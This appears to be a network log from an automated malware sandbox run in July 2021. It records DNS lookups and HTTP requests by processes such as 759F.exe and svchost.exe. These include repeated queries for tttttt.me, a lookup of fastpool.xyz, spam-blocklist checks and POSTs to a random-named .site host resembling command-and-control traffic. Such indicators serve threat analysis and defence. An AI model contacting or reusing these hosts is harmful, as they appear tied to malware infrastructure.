                                                                                          set-cookie: iprcd22a02f2f4cdcfe5d97197accaee0144=2858388; expires=Sat, 10 Jul 2021 00:08:58 GMT
                                                                                          set-cookie: pdhtkv=true; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: uncs=1; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: pdhtkv28=true; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: uncs28=1; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: a378f2fa76d8631459c58c8f1799c144
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:08:58 GMT
                                                                                          content-type: image/x-icon
                                                                                          content-length: 0
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: c114cc3fb3e957e4f6a7101c6a94bab1
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          venetrigni.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          Response
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          54.227.178.166
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          52.20.18.214
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://venetrigni.com/stats
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.227.178.166:443
                                                                                          Request
                                                                                          GET /stats HTTP/2.0
                                                                                          host: venetrigni.com
                                                                                          accept: */*
                                                                                          origin: https://www.profitabletrustednetwork.com
                                                                                          referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:08:58 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          content-length: 40
                                                                                          server: fasthttp
                                                                                          access-control-allow-origin: https://www.profitabletrustednetwork.com
                                                                                          access-control-allow-credentials: true
                                                                                          set-cookie: uid_id2=0b8bbe70-be9a-42b1-aa35-c9d6f01dc0e2:1:1; expires=Mon, 07 Jul 2031 23:08:58 GMT; secure; SameSite=None
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          typiccor.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          typiccor.com
                                                                                          IN A
                                                                                          Response
                                                                                          typiccor.com
                                                                                          IN A
                                                                                          54.225.64.149
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://typiccor.com/kKQhPEMgbpfpPY1Tk7zFlGtbiyW7ZUCqVcQgbppQLG0/?clck=5ba17bae056a51dcf980a730fdaf383f&sid=14576783
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.225.64.149:443
                                                                                          Request
                                                                                          GET /kKQhPEMgbpfpPY1Tk7zFlGtbiyW7ZUCqVcQgbppQLG0/?clck=5ba17bae056a51dcf980a730fdaf383f&sid=14576783 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: typiccor.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:08:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: session=KuTk8-aSLdIvAVgYahC7891_hEuoSwPq
                                                                                          Server: nginx
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://typiccor.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          54.225.64.149:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: typiccor.com
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Date: Fri, 09 Jul 2021 23:08:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 552
                                                                                          Connection: keep-alive
                                                                                          Server: nginx
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.microsoft.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.microsoft.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.microsoft.com
                                                                                          IN CNAME
                                                                                          www.microsoft.com-c-3.edgekey.net
                                                                                          www.microsoft.com-c-3.edgekey.net
                                                                                          IN CNAME
                                                                                          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                          IN CNAME
                                                                                          e13678.dscb.akamaiedge.net
                                                                                          e13678.dscb.akamaiedge.net
                                                                                          IN A
                                                                                          80.67.94.7
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.microsoft.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.microsoft.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.microsoft.com
                                                                                          IN CNAME
                                                                                          www.microsoft.com-c-3.edgekey.net
                                                                                          www.microsoft.com-c-3.edgekey.net
                                                                                          IN CNAME
                                                                                          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                          IN CNAME
                                                                                          e13678.dscb.akamaiedge.net
                                                                                          e13678.dscb.akamaiedge.net
                                                                                          IN A
                                                                                          104.85.1.163
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.bing.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.bing.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.bing.com
                                                                                          IN CNAME
                                                                                          a-0001.a-afdentry.net.trafficmanager.net
                                                                                          a-0001.a-afdentry.net.trafficmanager.net
                                                                                          IN CNAME
                                                                                          www-bing-com.dual-a-0001.a-msedge.net
                                                                                          www-bing-com.dual-a-0001.a-msedge.net
                                                                                          IN CNAME
                                                                                          dual-a-0001.a-msedge.net
                                                                                          dual-a-0001.a-msedge.net
                                                                                          IN A
                                                                                          204.79.197.200
                                                                                          dual-a-0001.a-msedge.net
                                                                                          IN A
                                                                                          13.107.21.200
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.bing.com/cortanaassist/rules?cc=US&version=6
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          204.79.197.200:443
                                                                                          Request
                                                                                          GET /cortanaassist/rules?cc=US&version=6 HTTP/2.0
                                                                                          host: www.bing.com
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 404
                                                                                          cache-control: private
                                                                                          content-length: 39491
                                                                                          content-type: text/html; charset=utf-8
                                                                                          content-encoding: br
                                                                                          vary: Accept-Encoding
                                                                                          p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                          set-cookie: MUID=1798923AF38167B203798255F20566B0; domain=.bing.com; expires=Wed, 03-Aug-2022 23:10:02 GMT; path=/; secure; SameSite=None
                                                                                          set-cookie: MUIDB=1798923AF38167B203798255F20566B0; expires=Wed, 03-Aug-2022 23:10:02 GMT; path=/; HttpOnly
                                                                                          set-cookie: _EDGE_S=F=1&SID=264617ADCBE763B90D3D07C2CA636210&mkt=en-us; domain=.bing.com; path=/; HttpOnly
                                                                                          set-cookie: _EDGE_V=1; domain=.bing.com; expires=Wed, 03-Aug-2022 23:10:02 GMT; path=/; HttpOnly
                                                                                          set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sun, 09-Jul-2023 23:10:02 GMT; path=/
                                                                                          set-cookie: SRCHUID=V=2&GUID=F3F98C53DD4A43A2B25F7BD63B050036&dmnchg=1; domain=.bing.com; expires=Sun, 09-Jul-2023 23:10:02 GMT; path=/
                                                                                          set-cookie: SRCHUSR=DOB=20210709; domain=.bing.com; expires=Sun, 09-Jul-2023 23:10:02 GMT; path=/
                                                                                          set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Sun, 09-Jul-2023 23:10:02 GMT; path=/
                                                                                          set-cookie: _SS=SID=264617ADCBE763B90D3D07C2CA636210; domain=.bing.com; path=/
                                                                                          x-snr-routing: 1
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-error-page: 404-custom
                                                                                          x-ua-compatible: IE=edge
                                                                                          x-cache: CONFIG_NOCACHE
                                                                                          x-msedge-ref: Ref A: F4C67CDC77C241F2A131891FBE589503 Ref B: AMBEDGE0817 Ref C: 2021-07-09T23:10:02Z
                                                                                          date: Fri, 09 Jul 2021 23:10:02 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          fastpool.xyz
                                                                                          -a
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          fastpool.xyz
                                                                                          IN A
                                                                                          Response
                                                                                          fastpool.xyz
                                                                                          IN A
                                                                                          213.91.128.133
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2197
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=dKWmqKuuahKZLYBDbtFFjO8FIGhEhbbdFnO4C5y-opBna32l6Ug9FwSuXWos1kQc3iq0stbzENbPAoPZxYqhq7Jvz9EfNC-jUa9eZst6p74sZPrctxUc8IjWrackykOMXlIZssdpZ4Jut4JLzgqFNl_m2jtyuCUvg65n_afsGv4; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2197
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=dQQZRUCWwz1kaFkfPeoYAZnqBebvqoxmnDQ6zxkBlyutsdLo5D0hqj68I-lrqZDl1c3CZ9ZjtgZghY6WlQbUCdPgBXc6F4PLc5cb7CuRnDf3X4RA4-50i68Ydf0cY6-9Y2LUCJIeJQywP1j_lM_-JMSCmXZjdGllja0nF_uqR2E; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2202
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=nunqpKZ_ZON92iMZHyQCVMwEbeEh-8gf4f3eVY1vx2s8b77FZ3xo-LnqpBjUqtztk41wuserels_FqClymM7F8rQKnvDndgm_xQ3bMV3FEiLXxOrknD6u74U-nJQlLCTFCpyNeieGrwrBoqG-5e4g6n2eRZD4DrQtERIZuY0N2o; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2198
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=kanAiYhvbObt5mp8fWN5Y2-3Iaw-rqQwcqyFGjS52j32gPXn6qodSRyz6Qe1EfdpZhtfPwYLHi98IRoXMGPiMHCWpkOVrYLpaZsOpTBKL3RONUIeaYIZcVdF4nA0ZzqhOQeg0VEQqmLvxXk0icVz24spMW0Al5raSLp62vyopAs; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2196
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=R-qPwdW4qkiDLIbPmQj0JsoJNZn83Cp0JqbM0E0a7Kf9DrUhEpgBWTfr6gTr-qNkUn2z7D3mPgd9HFG6NxGQSm7cmzFXwWxF9zMGhfe069zuYQlLyY36uOK86DdD1QjSnbLHqASjdm5WCsq8hTn3i-WsG67WVJXUYEGjMhiOg9k; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.google.com/
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          142.251.36.4:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                          Accept-Language: en
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                          Host: www.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:10:18 GMT
                                                                                          Expires: -1
                                                                                          Cache-Control: private, max-age=0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                          Content-Encoding: gzip
                                                                                          Server: gws
                                                                                          Content-Length: 2201
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Set-Cookie: NID=218=QBq6NgPF9jb3JNSr_fUqnB2H2dSS7myeYwm5i1bLgOAgeoC1rS2hZetqpQC1gRwjiTwG9UBzmJAv9PZwc3vE4MyKgYsrv_CwzD3Y3CDkhNIB5lz6g2DbPs40kRgpjh-xVnoUwAnr6ErSd_Yx72trPq2D5WeCIyOGSFvHueHCE1k; expires=Sat, 08-Jan-2022 23:10:18 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          i.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          IN A
                                                                                          82.118.23.111
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 109
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:11:50 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 247
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:11:50 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
